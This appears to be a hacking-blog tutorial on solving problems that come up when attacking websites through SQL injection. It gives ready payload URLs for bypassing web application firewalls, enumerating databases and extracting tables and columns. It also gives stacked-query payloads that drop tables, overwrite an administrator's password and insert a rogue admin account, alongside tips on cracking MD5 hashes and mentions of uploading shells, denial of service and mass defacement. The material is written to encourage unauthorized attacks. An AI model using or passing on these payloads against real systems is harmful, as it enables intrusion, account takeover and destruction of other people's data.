Today I'll write a tutorial for you that covers most problems while applying
SQL injection and solutions to them. Probably every person who has looked at
tutorials to hack a website have noticed that there are too many SQL tutorials.
Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection,
but actually those tutorials are stolen from somewhere else and the author most
of the time doesn't even know why does SQL injection works. All of those
tutorials are like textbooks with their ABC's and the result is just a mess.
Everyone is writing tutorials about SQL, but nobody covers the problems what
will come with that attack.
What is the cause of most problems related to SQL
injection?
Webdevelopers aren't always really dumb and they have also heard of hackers
and have implemented some security measures like WAF or manual protetion. WAF
is an Web application firewall and will block all malicous requests, but WAF's
are quite easy to bypass. Nobody will like to have their site hacked and they
are also implementing some security, but ofcourse it will be false to say that
if we fail then it's the servers fault. There's also a huge possibility that
we're injecting otherwise than we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that
applies a set of rules to an HTTP conversation. Generally, these rules cover
common attacks such as Cross-site Scripting (XSS) and SQL Injection. By
customizing the rules to your application, many attacks can be identified and
blocked. The effort to perform this customization can be significant and needs
to be maintained as the application is modified.
If you're interested in WAF's and how they're working then I suggest you read
it from wikipedia http://en.wikipedia.org/wiki/Application_firewall or from
Open Web Application Security Project what's also known as OWASP
https://www.owasp.org/index.php/Web_Application_Firewall
Order by is being blocked?
It rarely happens, but sometimes you can't use order by because the WAF has
blocked it or some other reason. Unfortunally we can't skip the order by and we
have to find another way. The way is simple, instead of using Order by we have
to use
Group by because that's very unlikely to be blacklisted
by the WAF.
If that request will return 'forbidden' then it means it's blocked.
http://site.com/gallery?id=1 order by 100--
Then you have to try to use Group by and it will return correct :
http://site.com/gallery?id=1 group by 100-- / success
Still there's a possibility that WAF will block the request, but there's one
other way and that's not very widely known. It's about using ( the main query )
= (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably receive an error like this : Operand should contain 5
column(s).
That error means that there are 5 columns and it means we can proceed to our
next step what's union select. The command was different than usual, but the
injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--
'order by 10000' and
still not error?
There's a small chapter where I'll tell you why sometimes order by won't work
and you don't see an error. The difference between this capther and the last
one is that previously your requests were blocked by the WAF, but here the
injection method is a little bit different. When I saw that the first time then
I thought about how a Database has 100000 columns because I'm not getting the
error while the site is vulnerable?
The answer is quite logical. By trying order by 1000000 we're not getting the
error because there are so many columns in there, we're not getting the error
because our injection isn't working.
Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
to bypass this you just have to change the URL a little bit. Add ' after the ID
number and at the end just enter +
Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example is working for you then it means you have to use it in the
next steps also. This isn't anything complicated, but to make everything clear
I'll still give you an example.
http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
Extracting data from other database.
Sometimes we can administer the injection successfully and there doesn't appear
any errors, it's a hacker's perfect dream. That dream will end the moment we
see that nothing useful exists while doing so. There are only few tables and
are called "News", "gallery" and "articles". They
aren't useful at all because we'd like to see tables like "Admin" or
"Administrator". Still we know that the server probably has several
databases and even if we find the information we're looking for, you should
still take a look within the other databases as well.
This will give you Schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
And with this code you can get
the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from informati
on_schema.tables where table_schema=0x
This code will give you the
column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x
I get error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables
Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL for this
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--
How to bypass WAF/Web
application firewall
The biggest reason why most the problems occur is due to most of the security
measures added to the server and WAF, but mostly they're of no use and can be
bypassed really easily. Mostly you will get error 404 like it's in the code
below, this is WAF. Most likely persons who're into SQL injection and bypassing
WAF's are thinking at the moment "Dude, only one bypassing method?",
but in this case we both know that bypassing WAF's is a different kind of
science and I could write a ebook on bypassing them. I'll answer all those
bypassing queries another time.
"404 forbidden you do not have permission to access to this webpage"
The code will look like this if
you get the error
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]
Change the url Like it's below.
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]
Is it possible to modify the information in the database by SQL
injection?
Most people aren't aware of it, but it's possible. You're able to Update, Drop,
insert and select information. Most of people who're dealing with SQL injection
have never looked deeper in the attack than shown in the average SQL injection
tutorial, but an average SQL injection tutorial doesn't have those statements
added. Most likely because most people are copy&pasting tutorials or just
overwriting them. You might ask that why should one update, drop or insert
information into the database if I can just look into the information to use the
current ones, why should we make another Administrator account if there already
exists one?
Reading
information is just one part of the injection and sometimes those other
commands that are quite infamous are more powerful than we think. If you have read
all those avalible SQL injection tutorials then you're probably aware that you
can read the information, but you didn't know that you can modify it. If you
have tried SQL injection then you have probably faced some problems that there
isn't an administrator account, why not use the Insert command to add one?
There isn't an admin page to login, why not drop the table and all information
so nobody can access it? I want to get rid of the current Administrator and
can't change the password, why not use the update commands to change the
password of the Administrator?
You must have noticed that I have talked alot about unneccesary information
that you probably don't need to know, but that's the information you need to
learn and understand to become a real hacker because you have to learn how SQL
databases are working to fiqure out how those commands are working because you
can't find tutorials about it on the network. It's just like math you learn in
school, if you won't learn it then you'll be in trouble when you grow up.
Theory is almost over and now let's get to the practice.
Let's say that we're visiting that page and it's vulnerable to SQL injection.
http://site.com/news.php?id=1
You have to start injecting to
look at the tables and columns in them, but let's assume that the current table
is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the
database. The SELECT is probably already covered in all the tutorials so let's
focus on the other three. Let's start with the DROP command.
I'd like to get rid of a table, how to do it?
http://site.com/news.php?id=1; DROP TABLE news
That seems easy, we have just dropped the table. I'd explain what we did in the
above statement, but it's quite hard to explain because you all can understand
the above command. Unfortunally most of 'hackers' who're making tutorials on
SQL injection aren't aware of it and sometimes these three words are more
important than all the information we can read on some tutorials.
Let's head to the next statement what's UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' =
'new data' WHERE column_name='information'--
Above explanation might be quite confusing so I'll add a query which is what
you're most likely going to use in real life :
http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--
We have just updated
Administrator account's password. In the above example, we updated the column
called 'admin_login" and added a password what is
"Crackhackforum" and that credential belongs to the account with the
username Rynaldo. Kinda heavy to explain, but I hope you'll understand.
How does INSERT work?
Luckily "INSERT" isn't as easy as the "DROP" statement, but
still quite understandable. Let's go further with Administrator privileges
because that's what most of people are heading to. Adding an administrator
account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--
INSERT INTO 'admin_login' means that we're inserting
something to 'admin_login'. Now we have to give instructions to the database,
about what exact information we want to add, ('login_id', 'login_name',
'password', 'details'). Means that the specifications we're adding to the DB
are Login_id, Login_name, password and details and the information the database
needs to create a new account. So far we have told the database what
information we want to add, we want to add a new account, password, account ID
and details. Now we have to tell the database what will be the new account's
username, it's password and account ID, VALUES
(2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username
will be Rynaldo, password of the account will be Crackhackforum. Your new
account has been added to the database and all you have to do is open up the
Administrator page and login.
Passwords aren't working
Sometimes the site is vulnerable to SQL and you can get the passwords. Then you
can find the site's username and password, but when you enter it into
adminpanel then it shows the "Wrong password" error. This can be
because those usernames and passwords are there, but aren't working. This is
made by site's admin to confuse you and actually the Cpanel doesn't contain any
username/password. Sometimes accounts are removed, but the accounts are still
in the database. Sometimes it isn't made by the admin and those credentials
have been left in the database after removing the login page, sometimes the
real credentials have been transfered to another database and old entries
haven't been deleted.
Sometimes I get some weird password
This weird password is called Hash and most likely it's MD5 hash. That means
the site's admin has added more security to the website and has encrypted the
passwords. Most popular crypting way is using MD5 hash. The best way to crack
MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack
the password even if it's really hard or isn't MD5. Also you can use
http://md5decrypter.com. I don't like to be a person who's pitching around with
small details that aren't correct, but here's a tip that you should keep in
mind. The domain is saying it's "md5decryptor" that reffers to
decrypting MD5 hashes.
Actually it's not possible to decrypt a hash because they're having 'one-way'
encryption. One way encryption means it can only be encrypted, but not
decrypted. Still it doesn't mean that we can't know what the hash means, we
have to crack it. Hashes can't be decrypted, only cracked. Those online sites
aren't cracking hashes every time, they're saving already cracked hashes &
results to their database and if you'll ask a hash what's already in their database,
you will get the result. :)
Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes that exist and their description
http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked
How to find admin page of site?
Some sites don't contain admin control panel and that means you can use any
method for finding the admin page, but that doesn't even exist. You might ask
"I got the username and password from the database, why isn't there any
admin login page then?", but sometimes they are just left in the database
after removing the Cpanel.
Mostly people are using tools called "Admin page finders". They have
some specific list of pages and will try them. If the page will give HTTP
response 200 then it means the page exists, but if the server responds with
HTTP response 404 then it means the page doesn't exist in there. If the page
exists in the list then the tool will say "Page found". I don't have
any tool to share at the moment, but if you're downloading it yourself then be
beware because those tools might beinfected with viruses.
Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the
administrator page if it's customly made or renamed. That means quite oftenly
those tools don't help us out and we have to use an alternative and I think the
best one is by using site crawlers. Most of you are probably having Acunetix
Web Vulnerability scanner 8 and it has one wonderful feature called site
crawler. It'll show you all the pages on the site and will 100% find the login
page if there exists one.
Automated SQL injection tools.
Automated SQL injection tools are programs what will do the whole work for you,
sometimes they will even crack the hashes and will find the Administrator page
for you. Most people are using automated SQL injection tools and most popular
of them are Havij and SQLmap. Havij is being used much more than SQLmap no
matter the other tool is much better for that injection. The sad truth why that
is so is that many people aren't even able to run SQLmap and those persons are
called script-kiddies. Being a script-kiddie is the worst thing you can be in
the hacking world and if you won't learn how to perform the attack manually and
are only using tools then you're one of them.
If you're using those tools to perform the attack then most people will think
that you're a script-kiddie because most likely you are. Professionals won't
take you seriously if you're injecting with them and you won't become a real
hacker neither.
My above text might give you a question, "But I've seen that even
Proffesional hackers are using SQLmap?" and I'd like to say that
everything isn't always black & white. If there are 10 databases, 50 tables
in them and 100 columns in the table then it would just take days to proccess
all that information. I'm also sometimes using automated tools because it makes
my life easier, but to use those tools you first have to learn how to use those
tools manually and that's what the tutorial above is teaching you.
Use automated tools only to make your life easier, but don't even look at them
if you don't know how to perform the attack manually.
What else can I do with SQL injection besides extracting information? There are
many things besides extracting information from the database and sometimes they
are much more powerful. We have talked about how sometimes the database doesn't
contain Administrator's credentials or you can't crack the hashes. Then all the
injection seems pointless because we can't use the information we have got from
the database. Still we can use another methods. Just like we can conduct CSRF
attack with persistent XSS, we can also move to another attacks through SQL
injection. One of the solution would be performing DOS attack on the website
which is vulnerable to SQL injection. DOS is shortened from Denial of service
and it's totaly different from DDOS that's Distributed Denial of Service. I
think that you all probably know what these are, but if I'm taking that attack
up with a sentence then DOS will allow us to take down the website temporarily
so users won't have access to the site. The other way would be uploading our
shell through SQL injection. If you're having a question about what's shell
then by saying it shortly, it's a script what we'll upload to the server and it
will create an backdoor for us and will give us all the privileges to do what
we'd like in the server and sometimes by uploading a shell you're having more
rights to modify things than the real Administrator has. After you have uploaded
a shell you can move forward to symlink which means that we can deface all the
sites that are sharing the same server. Shelling the website is probably the
most powerful thing you can use on the website. I have not covered how to
upload a shell through SQL injection and haven't covered how to cause DOS
neither, but probably will do in my next tutorials because uploading a shell
through SQL is another kind of science, just like bypassing WAF's. Those are
the most common methods that attackers will put in use after they can't get
anything useful out of the database. We have all heard that immagination is
unlimited and you can do whatever you'd like. That's kinda true and hacking
isn't an exception, there are more ways than I can count.
What to do if all the information doesn't display on the page?
I actually have rarely ever seen that there is so much information on the
webpage that it all just doesn't fit in there, but one person recently asked
that question from me and I decided to add it here. Also if you're having
questions then surely ask and I'll update the article. If we're getting back to
the question then the answer is simple, if all the information can't fit in the
screen then you have to look at the source code because everything displayed on
the webpage will be in there. Also sometimes information will appear in the tab
where usually is the site's name. If you can't see the information then
sometimes it's hidden, but with taking a deeper look you might find it from the
source. That's why you always have to look all the solutions out before quiting
because sometimes you might think "I can't inject into that..", but
actually the answer is hidden in the source.
- See more at:
http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html#sthash.eDKMK6Ce.dpuf
